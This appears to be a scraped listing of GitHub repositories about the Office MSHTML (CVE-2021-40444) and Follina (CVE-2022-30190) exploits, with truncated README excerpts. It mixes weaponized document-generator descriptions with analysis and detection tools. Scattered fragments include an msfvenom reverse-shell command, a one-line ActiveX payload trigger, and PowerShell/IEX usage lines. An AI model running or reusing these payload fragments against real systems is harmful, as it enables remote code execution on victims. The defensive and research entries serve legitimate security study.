CVE-2021-40444

A curated list of my GitHub stars! Generated by starred

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Adblock Filter List Awk Brainfuck C C# C++ CMake CSS Clojure CoffeeScript Common Lisp Coq Crystal D2 Dart Dockerfile EJS Elixir Emacs Lisp F# Go HCL HTML Haskell Haxe Java JavaScript Jinja Jsonnet Julia Jupyter Notebook Kotlin Lean Lua MDX Makefile Markdown Mathematica Mustache Nim Nix OCaml Obj

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444

Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444 How to disable ActiveX controls on an individual system ? 1 To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the reg file extension: Windows Registry Editor Version 500 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Curr

Microsoft MSHTML remote code execution vulnerability

SNP-Project Microsoft MSHTML remote code execution vulnerability (CVE-2021-40444) was exploited, demonstrating and explaining all the steps in details

CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-

CVE-2022-30190 This Repository Talks about the Follina MSDT from Defender Perspective Index About Timeline Understanding the Exploit List of IOCs Detection Strategy Testing and Researching Mitigation Plans References About The bug is a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability reported by crazyman of the Shadow Chaser Group Microsof

Various IOC

Malware Indicators of Compromise Hashes Formats MD5, SHA-1 and SHA256 Malwares Cobalt Strike RedLine Stealer and Distribute RedLine Stealer Trojanized dnSpy App and Dropped Malwares Abcbot Botnet - Xanthe Cryptomining Malware FluBot Botnet Phorpiex Botnet Blackmatter (For Windows v12, v13, v14, v16, v19, v20, v30 || For Linux v1602, v1604) Powerpoint attachments (A

CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit

Fully Weaponized CVE-2021-40444 Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files Update 31/05/2022 - CVE-2022-30190 - Follina Now the generator is able to generate the document required to exploit also the "Follina" attack (leveraging ms-msdt) Background Although many PoC are already aro

Modified code so that we don´t need to rely on CAB archives

CVE-2021-40444--CABless version Update: Modified code so that we don´t need to rely on CAB archives the file "indexhtml" that triggers payload execution will contain 1 line of code only, inside 'script' tag: <script>new ActiveXObject('htmlfile')Scriptlocation='wsf:///Downloads/cablessrar?wsf';</scrip

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

Fully Weaponized CVE-2021-40444 Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files Background Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability, as what I found available lacked valuable information that it's worth sharing, also c

python-oletools oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging It is based on the olefile parser See wwwdecalageinfo/python/oletools for m

This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit

CVE-2021-40444 builders This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit This repo is just for testing, research and educational purposes You are responsible for how you use the code provided in this repo The code is developed by reversing malware samples found in wild and shared by various security researchers The builders for thi

poc document

CVE-2022-30190 MS-MSDT Using Follina Attack Vector Deniz Koc | June 9, 2022 On May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability It is basically a remote code execution technique used through MSDT and MS Office program, namely Microsoft Word This attack takes place using malicious Word documents th

tools

python-oletools oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging It is based on the olefile parser See wwwdecalageinfo/python/oletools for m

CVE-2021-40444 - Custom CAB templates from MakeCAB

CVE-2021-40444-CAB CVE-2021-40444 - Custom CAB templates from MakeCAB [%] CVE-2021-40444 - Custom CAB templates with Command [%] [%] python3 pocpy <calccab> <command/filedll> [i] Example: python3 cabpy powershellcab "powershell -C mspaint" python3 cabpy powercab calcdll

VilNE Scanner

VilNE VilNE Scanner CURRENTLY DOWN - More recent browser updates have made this un-reliable Please see issues page for known bugs (eg unreliable on Wifi)

Dridex_17092021 Today I happened upon a fresh Dridex dropper sample from @Slvlombardo It uses a technique that I haven't personally seen previously, effectively placing the code that would have been inside a macro inside of an XML file within the container structure of the file This is reminiscent of some of the stuff we've seen around CVE-2021-40444 Below is a

Active directory Attacks and Scripts

Bloodhound Bloodhound Sharphound Cred dump AS-REP Roasting crackmapexec ntds Impacket secretsdump Kerberoasting Lazagne Mimikatz dcsync Mimikatz Logonpasswords Mimikatz minidump Pwdump READ NTDSdit File with Shadow Copy USEFULL Enumeration Active Directory Enumeration Bruteforce Check smb version and server info Enum Local Users Enum Shares rpcclient Lateral Movement Checking

This docx exploit uses res files inside Microsoft .docx file to execute malicious files. This exploit is related to CVE-2021-40444

Docx-Exploit-2021 This docx exploit uses res files inside Microsoft docx file to execute malicious files This exploit is related to CVE-2021-40444 If you can not reproduce Kindly message me on Telegram: LazarusRebor

CVE-2021-40444 POC

CVE-2021-40444 CVE-2021-40444 POC -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAu0enjPUx4R0+zWyY4FEI 0LUeiAJecPz6iDPdMRiIQHBPZBxKH7A+losAu7DB9IoY1GnGvFJzA1G4UkK6n/rg 2r65Ym3SloHoov/IxC2qcyz1UBftD0HBR8KE9Yy84k1sYIdNzKeWPQETY9UqEEy/ 1EPQ29H78JhEVCGZwntnHOzzAna6RYtmzm2JM5NGqOBwK7rkNVmmWXyCsbGy6aki 4mD+2gn3pYtAg6iSrvClT5cyKvUpyPx07+YdHbhGxlQ8DJ7UsoUiuI6lRbB

CVE-2021-40444--CABless version Update: Modified code so that we don´t need to rely on CAB archives the file "indexhtml" that triggers payload execution will contain 1 line of code only, inside 'script' tag: <script>new ActiveXObject('htmlfile')Scriptlocation='wsf:///Downloads/cablessrar?wsf';</scrip

Reverse engineering the "A Letter Before Court 4.docx" malicious files exploting cve-2021-40444

cve-2021-40444 Reverse engineering the "A Letter Before Court 4docx" malicious files exploting cve-2021-40444 Files (including malicious word and cab-file) may be downloaded on anyrun: appanyrun/tasks/36c14029-9df8-439c-bba0-45f2643b0c70/# Note! The domain name in the original malicious code is replaced with 127001:8000 to avoid any mistakes executing m

MS-MSDT Follina CVE-2022-30190 PoC document generator

MS-MSDT Follina CVE-2022-30190 PoC Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution) Creation of this Script is based on CVE-2021-40444 PoC by LockedByte and writeup by Tothi Using First modify backuphtml and replace powershell payload Right now just pops a calcexe using IEX('calcexe') python3 exploitpy generate <SR

CVE-2021-40444 Usage Ensure to run setupsh first as you will need few directories Once you have run the script, you should be able to run genpy with the example given:- # Usage python3 genpy -d document/Sampledocx -p payload/payloaddll -i "10101010" -t html/templatehtml -c payloadcab -f nothinginf -r Sample2docx -obf 3 # Flag -d -> Our doc

This Repository Talks about the Follina MSDT from Defender Perspective

MSDT_CVE-2022-30190 This Repository Talks about the Follina MSDT from Defender Perspective Index About Timeline Understanding the Exploit List of IOCs Detection Strategy Testing and Researching Mitigation Plans References About The bug is a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability reported by crazyman of the Shadow Chaser Group Mic

CVE-2021-40444 PoC

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

panopticon-WizardSpider wwwcyjaxcom/2022/07/15/who-is-trickbot/ wwwwiredcom/story/trickbot-malware-group-internal-messages/ wwwbleepingcomputercom/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/ wwwanalyst1com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel gocrowdstrikecom/rs/281-OBQ

2021 Velociraptor Competition My 2021 Velociraptor Competition package contains multiple Windows Detection, Application, Event log and Scanner artifacts, four new MacOS artifacts and one Server artifact These artifacts were created based on real-world Incident Response use-cases, with the mindset of an Incident Responder and a Threat Hunter They build upon Velociraptor's

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

Phishing-钓鱼研究

Phishing-网络钓鱼攻击 钓鱼不仅是一种户外运动，更是一种网络安全攻击技术。本项目用于记录钓鱼攻击的相关内容，包括优秀的钓鱼技术技巧或优秀的钓鱼实战项目案例等。钓鱼攻击源于技术，又高于技术。钓鱼攻击源于欺骗，欺骗的尽头是免杀。深入研究并积极实践社工技术，在很多

Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit

Fully Weaponized CVE-2021-40444 Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution), works with arbitrary DLL files Background Although many PoC are already around the internet, I guessed to give myself a run to weaponizing this vulnerability, as what I found available lacked valuable information that it's worth sharing, also c

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit CVE-2021-40444 EXPLOIT TO USE IN METASPLOIT, ALLOWS ATTACKERS TO GET AN REMOTE CODE EXECUTION THROUGH MICROSOFT OFFICE WORD BY INJECTING MALICIOUS CODE IN THE FILE

CVE-2022-30190 This Repository Talks about the Follina MSDT from Defender Perspective Index About Timeline Understanding the Exploit List of IOCs Detection Strategy Testing and Researching Mitigation Plans References About The bug is a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability reported by crazyman of the Shadow Chaser Group Microsof

data-exfiltration Windows javascript file and folder exfiltration exploit for outdated vulnerabilities The javascript vulnerability uses the ActiveXObject vulnerability to get RCE ActiveXObject was a vulnerability patched in 2021 (CVE-2021-40444) The java vulnerability uses signed java applet's ability to gain privledge on the user device after the user accepts the apple

22 tools

python-oletools oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging It is based on the olefile parser See wwwdecalageinfo/python/oletools for m

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.

python-oletools oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging It is based on the olefile parser See wwwdecalageinfo/python/oletools for m

CVE-2021-40444 docx Generate docx generate to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) creeate blank docx file add "Bitmap Iamge" object in "Inert/Object" menu

Microsoft Office Word Rce 复现(CVE-2022-30190)

CVE-2022-30190 Microsoft Office Word Rce 复现(CVE-2022-30190) 漏洞简介 MS Office docx 文件可能包含作为 HTML 文件的外部 OLE 对象引用。有一个 HTML 场景 ms-msdt: 调用 msdt 诊断工具，它能够执行任意代码（在参数中指定）。 结果是一个可怕的攻击向量，通过打开恶意 docx 文件（不使用宏）来获取 RCE。 开始

CVE 2021 40444 Windows Exploit services.dll

CVE-2021-40444_CAB_archives CVE-2021-40444 - Custom CAB templates from MakeCAB Reference ddl githubcom/Udyz/CVE-2021-40444-CAB/blob/main/calcdll

CVE-2021-40444

CVE-2021-40444 Sample

CVE-2021-40444-Sample Patch CAB: githubcom/Udyz/CVE-2021-40444/edit/master/patch_cabpy

CVE-2021-40444 Analysis This repository contains the deobfuscated exploit code for CVE-2021-40444 as recovered by Immersive Labs during their analysis This repository supports the blog article that can be found at immersivelabscom/resources/blog/analyzing-the-cve-2021-40444-exploit/

CVE2021-40444 Related Links: bazaarabusech/sample/d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 bazaarabusech/sample/938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 bazaarabusech/sample/1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00 msrcmicrosoftcom/update-guide/vulnerability/CVE-2021-

CNAM TP5 : Generation d'un exploit pour Microsoft WORD (CVE-2021-40444) Le but de ce TP est de se familiariser avec l'exploitation des corruptions mémoire, via l'exploitation d'un stack overflow simple En passant, nous allons apprendre à utiliser git, docker, et un debugger : gdb Prérequis Utiliser la commande "git clone" pou

An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework.

CVE-2021-40444-POC An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework works best if not run in FlareVM PREPARATION Git Clone the repository from githubcom/lockedbyte/CVE-2021-40444 Prepare the dll template to be used later with msfvenom msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP&g

CVE-2021-40444

Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit CVE-2021-40444 EXPLOIT TO USE IN METASPLOIT, ALLOWS ATTACKERS TO GET AN REMOTE CODE EXECUTION THROUGH MICROSOFT OFFICE WORD BY INJECTING MALICIOUS CODE IN THE FILE

A curated list of my GitHub stars!

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ai analytics android angular ansible api arduino artificial-intelligence automation awesome awesome-list aws azure bash blockchain c chatgpt chrome-extension cli code compiler cpp csharp css cybersecurity data data-analysis data-visualization database deep-learning devops discord django docker d

APT Project Organized

APT 공격 시나리오 1 공격 기본 정보 공격 대상 : R&B손해보험 공격 이유 : 회사에 등록된 개인 또는 여러 회사들의 중요 정보를 랜섬웨어로 잠그고 돈을 요구하기 위해서 공격 공격 계획 : R&B손해보험에서 주최하는 디지털 취약 계층 서비스 아이디어 공모전에 참가 신청�

Open Source Intelligence Executive Summary Conducting Open-Source Intelligence research on the banking industry which has the highest risks and probable cyber-attacks in the Australian banking sector The company profile in this case study enlists National Australia Bank that is a premium-level banking service that offers more than managing money NAB has a plethora of techn

CVE-2021-40444 PoC

CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCEmd for manual rep

〖EXP〗Ladon CVE-2021-40444 Office漏洞复现 漏洞概述 北京时间9月8日，绿盟科技CERT监测到微软发布安全通告披露了Microsoft MSHTML 远程代码执行漏洞，攻击者可通过制作恶意的 ActiveX 控件供托管浏览器呈现引擎的 Microsoft Office文档使用，成功诱导用户打开恶意文档后，可在目标系统上以该用户权�

MS-URI-Handlers The information below was tested from my personal computer Results will be different from your own Primer Anytime you make a request in the browser, add an external link to a document, etc Windows first checks what protocol is speified The most common are web requests that use HTTP and HTTPS such as: githubcom

A malicious .cab creation tool for CVE-2021-40444

Caboom ██████╗ █████╗ ██████╗ ██████╗ ██████╗ ███╗ ███╗ ██╗ ██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔═══██╗████╗ ████║ ██║ ██║ ███████║████�

This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking government officials Western Asia and Eastern Europe

APT28 Adversary Simulation This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking government officials Western Asia and Eastern Europe the attack campaign was active from October to November 2021, The attack chain starts with the execution of an Excel downloader sent to the victim via email which exploits an MSHTML remote code execution vulnerability

Ansible playbooks related to Cybersecurity

cyber-ansible Ansible playbooks related to Cybersecurity Keeping Windows systems up-to-date Automated upgrade of Windows servers and workstations The upgrade can be launched in a controlled way to different groups of boxes defined in the inventories It takes care of Windows updates as well as packages installed through Chocolatey repositories Tested on Windows 10 (64, 32bits